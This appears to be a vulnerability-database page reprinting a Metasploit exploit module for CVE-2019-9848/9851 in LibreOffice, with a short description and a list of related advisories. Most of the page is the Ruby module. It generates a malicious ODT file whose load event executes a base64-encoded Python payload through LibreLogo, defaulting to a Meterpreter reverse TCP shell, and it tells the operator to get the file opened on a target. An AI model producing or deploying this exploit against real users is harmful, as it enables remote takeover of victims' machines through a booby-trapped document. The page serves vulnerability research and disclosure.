LibreOffice Macro Python Code Execution

🗓️ 20 Aug 2019 00:00:00Reported by Shelby PaceType

packetstorm🔗 packetstormsecurity.com👁 263 Views

LibreOffice Macro allows Python code execution through LibreLogo, potentially leading to RCE. It generates an ODT file with a program event triggering arbitrary python code and Metasploit payload.

Reporter	Title	Published	Views	Family All 207
0day.today	LibreOffice 6.0.7 / 6.1.3 - Macro Code Execution Exploit	18 Apr 201900:00	–	zdt
0day.today	LibreOffice < 6.2.6 Macro - Python Code Execution Exploit	21 Aug 201900:00	–	zdt
GithubExploit	Exploit for Product UI does not Warn User of Unsafe Actions in Libreoffice	14 Apr 201911:10	–	githubexploit
ATTACKERKB	CVE-2019-9848	17 Jul 201900:00	–	attackerkb
ATTACKERKB	LibreOffice Macro Code Execution	25 Mar 201900:00	–	attackerkb
Tenable Nessus	Amazon Linux 2 : libreoffice (ALASLIBREOFFICE-2023-002)	27 Sep 202300:00	–	nessus
Tenable Nessus	Alibaba Cloud Linux 3 : 0038: libreoffice (ALINUX3-SA-2022:0038)	14 May 202500:00	–	nessus
Tenable Nessus	CentOS 8 : libreoffice (CESA-2020:1598)	1 Feb 202100:00	–	nessus
Tenable Nessus	CentOS 7 : libreoffice (CESA-2019:2130)	30 Aug 201900:00	–	nessus
Tenable Nessus	CentOS 7 : libreoffice (RHSA-2020:1151)	10 Apr 202000:00	–	nessus

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::FILEFORMAT  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'LibreOffice Macro Python Code Execution',  
'Description' => %q{  
LibreOffice comes bundled with sample macros written in Python and  
allows the ability to bind program events to them.  
  
LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE.  
  
This module generates an ODT file with a dom loaded event that,  
when triggered, will execute arbitrary python code and the metasploit payload.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Nils Emmerich', # Vulnerability discovery and PoC  
'Shelby Pace', # Base module author (CVE-2018-16858), module reviewer and platform-independent code  
'LoadLow', # This msf module  
'Gabriel Masei' # Global events vuln. disclosure  
],  
'References' =>  
[  
[ 'CVE', '2019-9851' ],  
[ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9848/' ],  
[ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9851/' ],  
[ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ]  
],  
'DisclosureDate' => '2019-07-16',  
'Platform' => 'python',  
'Arch' => ARCH_PYTHON,  
'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' },  
'Targets' => [ ['Automatic', {}] ],  
'DefaultTarget' => 0  
))  
  
register_options(  
[  
OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']),  
OptString.new('TEXT_CONTENT', [true, 'Text written in the document. It will be html encoded.', 'My Report']),  
])  
end  
  
def gen_file  
text_content = Rex::Text.html_encode(datastore['TEXT_CONTENT'])  
py_code = Rex::Text.encode_base64(payload.encoded)  
@cmd = "exec(eval(str(__import__('base64').b64decode('#{py_code}'))))"  
@cmd = Rex::Text.html_encode(@cmd)  
  
fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))  
libre_file = ERB.new(fodt_file).result(binding())  
  
print_status("File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.")  
  
libre_file  
rescue Errno::ENOENT  
fail_with(Failure::NotFound, 'Cannot find template file')  
end  
  
def exploit  
fodt_file = gen_file  
  
file_create(fodt_file)  
end  
end  
`

20 Aug 2019 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.92343